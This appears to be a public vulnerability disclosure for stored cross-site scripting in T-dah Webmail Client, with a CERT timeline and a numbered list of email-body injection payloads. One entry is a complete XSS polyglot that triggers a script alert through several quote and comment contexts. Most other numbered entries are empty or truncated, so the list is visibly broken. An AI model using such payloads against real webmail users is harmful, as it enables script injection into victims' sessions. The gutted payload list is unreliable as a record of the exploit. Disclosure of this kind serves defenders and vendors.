#!/usr/bin/python ''' Author: loneferret of Offensive Security Product: T-dah Webmail Client Version: 3.2.0-2.3 Vendor Site: http://t-dahmail.sourceforge.net/index.php Software Download: http://sourceforge.net/projects/t-dahmail/ Contact: http://t-dahmail.sourceforge.net/forum/ Timeline: 29 May 2012: Vulnerability reported to CERT 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012 23 Jul 2012: Update from CERT: No response from vendor 08 Aug 2012: Public Disclosure Installed On: Ubuntu Server LAMP 11.10 Client Test OS: Windows 7 Pro (x86) SP1 Browser Used: Internet Explorer 9 Injection Point: Body Injection Payload(s): 1: 2: 3: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{} 4: 5: exp/* 6: 7: 8:
9: 10: 11: 12: 13: